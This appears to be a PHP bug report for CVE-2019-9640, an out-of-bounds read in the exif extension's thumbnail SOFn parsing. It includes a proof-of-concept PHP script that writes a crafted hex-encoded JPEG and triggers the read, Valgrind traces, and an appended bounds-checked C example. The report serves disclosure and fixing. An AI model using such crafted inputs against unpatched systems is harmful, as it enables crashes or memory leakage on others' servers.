[2019-01-30 10:49 UTC] cmb@php.net
-Status: Open
+Status: Verified
-PHP Version: 7.3.1
+PHP Version: 7.1Git-2019-01-30 (Git)
[2019-03-02 21:39 UTC] stas@php.net
-Status: Verified
+Status: Assigned
-PHP Version: 7.1Git-2019-01-30 (Git)
+PHP Version: 7.1.26
-Assigned To:
+Assigned To: stas
-CVE-ID:
+CVE-ID: needed
[2019-03-04 07:35 UTC] stas@php.net
-Status: Assigned
+Status: Closed
[2019-03-12 08:28 UTC] chamal dot desilva at gmail dot com
[2019-03-12 19:55 UTC] stas@php.net
-CVE-ID: needed
+CVE-ID: 2019-9640
Copyright © 2001-2025 The PHP Group. All rights reserved.
Last updated: Fri Oct 24 07:00:01 2025 UTC
Description:
------------
Version
-------
PHP 7.3.1
PHP 7.4.0-dev (cli)

Description
-----------
This bug is present in the exif_scan_thumbnail method of the ext/exif/exif.c file.
These lines in the exif_scan_thumbnail method cause this bug.

...
case M_SOF15:
    // exif_process_SOFn method reads 7 bytes from "uchar *data" pointer.
    // exif_process_SOFn or exif_scan_thumbnail methods don't validate
    // that "uchar *data" pointer has enough data to read.
    exif_process_SOFn(data+pos, marker, &sof_info);
....

Configure Line
--------------
./configure --prefix=/dir-name/install --enable-cli --enable-exif --enable-debug --without-pear

Test script:
---------------
<?php
$width = 0;
$height = 0;
$filename = dirname(__FILE__).DIRECTORY_SEPARATOR.'test.jpg';
file_put_contents($filename, hex2bin("ffd8e100554578696600004d4d002a0000000c00000000000000000012000302020001000000010500000001110001000000013d000000010100010000000101000000da00020000ffd8ffcf000000000000000000000000da0002"));
$s = exif_thumbnail($filename, $width, $height);
echo "Width ".$width."<br>";
echo "Height ".$height;
?>

Actual result:
--------------
Valgrind Output
---------------
Source line numbers are from PHP 7.3.1

export ZEND_DONT_UNLOAD_MODULES=1
export USE_ZEND_ALLOC=0
valgrind ./php/TestCases/test.php

==3659== Invalid read of size 1
==3659==    at 0x24C2E4: exif_process_SOFn (exif.c:2632)
==3659==    by 0x24F135: exif_scan_thumbnail (exif.c:3923)
==3659==    by 0x2521B3: zif_exif_thumbnail (exif.c:4654)
==3659==    by 0x52EA5B: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:690)
==3659==    by 0x59146D: execute_ex (zend_vm_execute.h:55418)
==3659==    by 0x59608D: zend_execute (zend_vm_execute.h:60834)
==3659==    by 0x4D2103: zend_execute_scripts (zend.c:1568)
==3659==    by 0x44904D: php_execute_script (main.c:2630)
==3659==    by 0x598C98: do_cli (php_cli.c:997)
==3659==    by 0x599E3F: main (php_cli.c:1389)
==3659==  Address 0x4d6ccbe is 0 bytes after a block of size 6 alloc'd
==3659==    at 0x483021B: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==3659==    by 0x4A0495: __zend_malloc (zend_alloc.c:2904)
==3659==    by 0x49F82D: _emalloc (zend_alloc.c:2494)
==3659==    by 0x49FD14: _estrndup (zend_alloc.c:2605)
==3659==    by 0x24CBB0: exif_thumbnail_extract (exif.c:2929)
==3659==    by 0x24E7D1: exif_process_IFD_in_JPEG (exif.c:3598)
==3659==    by 0x24E942: exif_process_TIFF_in_JPEG (exif.c:3644)
==3659==    by 0x24EA03: exif_process_APP1 (exif.c:3669)
==3659==    by 0x24EECE: exif_scan_JPEG_header (exif.c:3814)
==3659==    by 0x24FDF5: exif_scan_FILE_header (exif.c:4203)
==3659==    by 0x250664: exif_read_from_impl (exif.c:4344)
==3659==    by 0x2506CF: exif_read_from_stream (exif.c:4361)
==3659==
==3659== Invalid read of size 1
==3659==    at 0x24A45B: php_jpg_get16 (exif.c:1437)
==3659==    by 0x24C2FA: exif_process_SOFn (exif.c:2633)
==3659==    by 0x24F135: exif_scan_thumbnail (exif.c:3923)
==3659==    by 0x2521B3: zif_exif_thumbnail (exif.c:4654)
==3659==    by 0x52EA5B: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:690)
==3659==    by 0x59146D: execute_ex (zend_vm_execute.h:55418)
==3659==    by 0x59608D: zend_execute (zend_vm_execute.h:60834)
==3659==    by 0x4D2103: zend_execute_scripts (zend.c:1568)
==3659==    by 0x44904D: php_execute_script (main.c:2630)
==3659==    by 0x598C98: do_cli (php_cli.c:997)
==3659==    by 0x599E3F: main (php_cli.c:1389)
==3659==  Address 0x4d6ccbf is 1 bytes after a block of size 6 alloc'd
==3659==    at 0x483021B: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==3659==    by 0x4A0495: __zend_malloc (zend_alloc.c:2904)
==3659==    by 0x49F82D: _emalloc (zend_alloc.c:2494)
==3659==    by 0x49FD14: _estrndup (zend_alloc.c:2605)
==3659==    by 0x24CBB0: exif_thumbnail_extract (exif.c:2929)
==3659==    by 0x24E7D1: exif_process_IFD_in_JPEG (exif.c:3598)
==3659==    by 0x24E942: exif_process_TIFF_in_JPEG (exif.c:3644)
==3659==    by 0x24EA03: exif_process_APP1 (exif.c:3669)
==3659==    by 0x24EECE: exif_scan_JPEG_header (exif.c:3814)
==3659==    by 0x24FDF5: exif_scan_FILE_header (exif.c:4203)
==3659==    by 0x250664: exif_read_from_impl (exif.c:4344)
==3659==    by 0x2506CF: exif_read_from_stream (exif.c:4361)
==3659==
==3659== Invalid read of size 1
==3659==    at 0x24A46C: php_jpg_get16 (exif.c:1437)
==3659==    by 0x24C2FA: exif_process_SOFn (exif.c:2633)
==3659==    by 0x24F135: exif_scan_thumbnail (exif.c:3923)
==3659==    by 0x2521B3: zif_exif_thumbnail (exif.c:4654)
==3659==    by 0x52EA5B: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:690)
==3659==    by 0x59146D: execute_ex (zend_vm_execute.h:55418)
==3659==    by 0x59608D: zend_execute (zend_vm_execute.h:60834)
==3659==    by 0x4D2103: zend_execute_scripts (zend.c:1568)
==3659==    by 0x44904D: php_execute_script (main.c:2630)
==3659==    by 0x598C98: do_cli (php_cli.c:997)
==3659==    by 0x599E3F: main (php_cli.c:1389)
==3659==  Address 0x4d6ccc0 is 2 bytes after a block of size 6 alloc'd
==3659==    at 0x483021B: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==3659==    by 0x4A0495: __zend_malloc (zend_alloc.c:2904)
==3659==    by 0x49F82D: _emalloc (zend_alloc.c:2494)
==3659==    by 0x49FD14: _estrndup (zend_alloc.c:2605)
==3659==    by 0x24CBB0: exif_thumbnail_extract (exif.c:2929)
==3659==    by 0x24E7D1: exif_process_IFD_in_JPEG (exif.c:3598)
==3659==    by 0x24E942: exif_process_TIFF_in_JPEG (exif.c:3644)
==3659==    by 0x24EA03: exif_process_APP1 (exif.c:3669)
==3659==    by 0x24EECE: exif_scan_JPEG_header (exif.c:3814)
==3659==    by 0x24FDF5: exif_scan_FILE_header (exif.c:4203)
==3659==    by 0x250664: exif_read_from_impl (exif.c:4344)
==3659==    by 0x2506CF: exif_read_from_stream (exif.c:4361)
==3659==
==3659== Invalid read of size 1
==3659==    at 0x24A45B: php_jpg_get16 (exif.c:1437)
==3659==    by 0x24C311: exif_process_SOFn (exif.c:2634)
==3659==    by 0x24F135: exif_scan_thumbnail (exif.c:3923)
==3659==    by 0x2521B3: zif_exif_thumbnail (exif.c:4654)
==3659==    by 0x52EA5B: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:690)
==3659==    by 0x59146D: execute_ex (zend_vm_execute.h:55418)
==3659==    by 0x59608D: zend_execute (zend_vm_execute.h:60834)
==3659==    by 0x4D2103: zend_execute_scripts (zend.c:1568)
==3659==    by 0x44904D: php_execute_script (main.c:2630)
==3659==    by 0x598C98: do_cli (php_cli.c:997)
==3659==    by 0x599E3F: main (php_cli.c:1389)
==3659==  Address 0x4d6ccc1 is 3 bytes after a block of size 6 alloc'd
==3659==    at 0x483021B: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==3659==    by 0x4A0495: __zend_malloc (zend_alloc.c:2904)
==3659==    by 0x49F82D: _emalloc (zend_alloc.c:2494)
==3659==    by 0x49FD14: _estrndup (zend_alloc.c:2605)
==3659==    by 0x24CBB0: exif_thumbnail_extract (exif.c:2929)
==3659==    by 0x24E7D1: exif_process_IFD_in_JPEG (exif.c:3598)
==3659==    by 0x24E942: exif_process_TIFF_in_JPEG (exif.c:3644)
==3659==    by 0x24EA03: exif_process_APP1 (exif.c:3669)
==3659==    by 0x24EECE: exif_scan_JPEG_header (exif.c:3814)
==3659==    by 0x24FDF5: exif_scan_FILE_header (exif.c:4203)
==3659==    by 0x250664: exif_read_from_impl (exif.c:4344)
==3659==    by 0x2506CF: exif_read_from_stream (exif.c:4361)
==3659==
==3659== Invalid read of size 1
==3659==    at 0x24A46C: php_jpg_get16 (exif.c:1437)
==3659==    by 0x24C311: exif_process_SOFn (exif.c:2634)
==3659==    by 0x24F135: exif_scan_thumbnail (exif.c:3923)
==3659==    by 0x2521B3: zif_exif_thumbnail (exif.c:4654)
==3659==    by 0x52EA5B: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:690)
==3659==    by 0x59146D: execute_ex (zend_vm_execute.h:55418)
==3659==    by 0x59608D: zend_execute (zend_vm_execute.h:60834)
==3659==    by 0x4D2103: zend_execute_scripts (zend.c:1568)
==3659==    by 0x44904D: php_execute_script (main.c:2630)
==3659==    by 0x598C98: do_cli (php_cli.c:997)
==3659==    by 0x599E3F: main (php_cli.c:1389)
==3659==  Address 0x4d6ccc2 is 4 bytes after a block of size 6 alloc'd
==3659==    at 0x483021B: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==3659==    by 0x4A0495: __zend_malloc (zend_alloc.c:2904)
==3659==    by 0x49F82D: _emalloc (zend_alloc.c:2494)
==3659==    by 0x49FD14: _estrndup (zend_alloc.c:2605)
==3659==    by 0x24CBB0: exif_thumbnail_extract (exif.c:2929)
==3659==    by 0x24E7D1: exif_process_IFD_in_JPEG (exif.c:3598)
==3659==    by 0x24E942: exif_process_TIFF_in_JPEG (exif.c:3644)
==3659==    by 0x24EA03: exif_process_APP1 (exif.c:3669)
==3659==    by 0x24EECE: exif_scan_JPEG_header (exif.c:3814)
==3659==    by 0x24FDF5: exif_scan_FILE_header (exif.c:4203)
==3659==    by 0x250664: exif_read_from_impl (exif.c:4344)
==3659==    by 0x2506CF: exif_read_from_stream (exif.c:4361)
==3659==
==3659== Invalid read of size 1
==3659==    at 0x24C323: exif_process_SOFn (exif.c:2635)
==3659==    by 0x24F135: exif_scan_thumbnail (exif.c:3923)
==3659==    by 0x2521B3: zif_exif_thumbnail (exif.c:4654)
==3659==    by 0x52EA5B: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:690)
==3659==    by 0x59146D: execute_ex (zend_vm_execute.h:55418)
==3659==    by 0x59608D: zend_execute (zend_vm_execute.h:60834)
==3659==    by 0x4D2103: zend_execute_scripts (zend.c:1568)
==3659==    by 0x44904D: php_execute_script (main.c:2630)
==3659==    by 0x598C98: do_cli (php_cli.c:997)
==3659==    by 0x599E3F: main (php_cli.c:1389)
==3659==  Address 0x4d6ccc3 is 5 bytes after a block of size 6 alloc'd
==3659==    at 0x483021B: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==3659==    by 0x4A0495: __zend_malloc (zend_alloc.c:2904)
==3659==    by 0x49F82D: _emalloc (zend_alloc.c:2494)
==3659==    by 0x49FD14: _estrndup (zend_alloc.c:2605)
==3659==    by 0x24CBB0: exif_thumbnail_extract (exif.c:2929)
==3659==    by 0x24E7D1: exif_process_IFD_in_JPEG (exif.c:3598)
==3659==    by 0x24E942: exif_process_TIFF_in_JPEG (exif.c:3644)
==3659==    by 0x24EA03: exif_process_APP1 (exif.c:3669)
==3659==    by 0x24EECE: exif_scan_JPEG_header (exif.c:3814)
==3659==    by 0x24FDF5: exif_scan_FILE_header (exif.c:4203)
==3659==    by 0x250664: exif_read_from_impl (exif.c:4344)
==3659==    by 0x2506CF: exif_read_from_stream (exif.c:4361)
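As an added illustration, not code from the report or from PHP's ext/exif/exif.c and not the project's patch, here is a bounds-checked SOFn walk over a thumbnail buffer written against the shape the Valgrind trace above describes: the length check sits before the field reads, so a 6-byte block whose SOFn payload starts at offset 4 is rejected instead of read past. Function names and the 8-byte minimum (length, precision, height, width, components per the JPEG SOF layout) are this example's own assumptions.

```c
#include <stdbool.h>
#include <stddef.h>
/* Bytes a SOFn parser reads from the length field onward, per the JPEG SOF
 * layout: length(2) precision(1) height(2) width(2) components(1). */
#define SOF_MIN_BYTES 8
typedef struct { int bits_per_sample, height, width, num_components; } sof_info;
static unsigned get16(const unsigned char *p) { return (p[0] << 8) | p[1]; }

/* Parse the SOFn payload at data[pos] (pos = first byte after the FFCn
 * marker) without ever reading past `size`. Returns false on rejection. */
bool parse_sofn_checked(const unsigned char *data, size_t size, size_t pos, sof_info *out)
{
    /* The check that must precede any field read; the subtraction form
     * cannot overflow the way pos + SOF_MIN_BYTES could. */
    if (pos > size || size - pos < SOF_MIN_BYTES) return false;
    unsigned seg_len = get16(data + pos);
    /* The declared segment length must cover the fixed fields and fit. */
    if (seg_len < SOF_MIN_BYTES || seg_len > size - pos) return false;
    out->bits_per_sample = data[pos + 2];
    out->height         = get16(data + pos + 3);
    out->width          = get16(data + pos + 5);
    out->num_components = data[pos + 7];
    return true;
}

/* Walk an embedded thumbnail's markers and parse the first SOFn (FFC0..FFCF
 * minus DHT C4, JPG C8, DAC CC). Returns 1 on success, 0 for a truncated
 * buffer or no SOFn. Assumes every marker but SOI/EOI has a length field. */
int scan_thumbnail_sof(const unsigned char *thumb, size_t size, sof_info *out)
{
    if (size < 2 || thumb[0] != 0xFF || thumb[1] != 0xD8) return 0; /* no SOI */
    for (size_t pos = 2; pos + 4 <= size; ) {            /* marker + length */
        unsigned char m = thumb[pos + 1];
        if (thumb[pos] != 0xFF || m == 0xD9) return 0;    /* garbage or EOI */
        if (m >= 0xC0 && m <= 0xCF && m != 0xC4 && m != 0xC8 && m != 0xCC)
            return parse_sofn_checked(thumb, size, pos + 2, out) ? 1 : 0;
        unsigned seg_len = get16(thumb + pos + 2);
        if (seg_len < 2 || seg_len > size - (pos + 2)) return 0; /* cut off */
        pos += 2 + seg_len;
    }
    return 0;
}

/* Width of the first SOFn, or -1 when the buffer was rejected. */
int sof_width_of(const unsigned char *thumb, size_t size)
{
    sof_info s;
    return scan_thumbnail_sof(thumb, size, &s) ? s.width : -1;
}
```

Calling scan_thumbnail_sof on the six bytes FF D8 FF CF 00 00 (SOI, SOF15 marker, empty length field) returns 0 from the size check, while a thumbnail carrying a complete SOF0 segment fills sof_info with precision, height, width and component count.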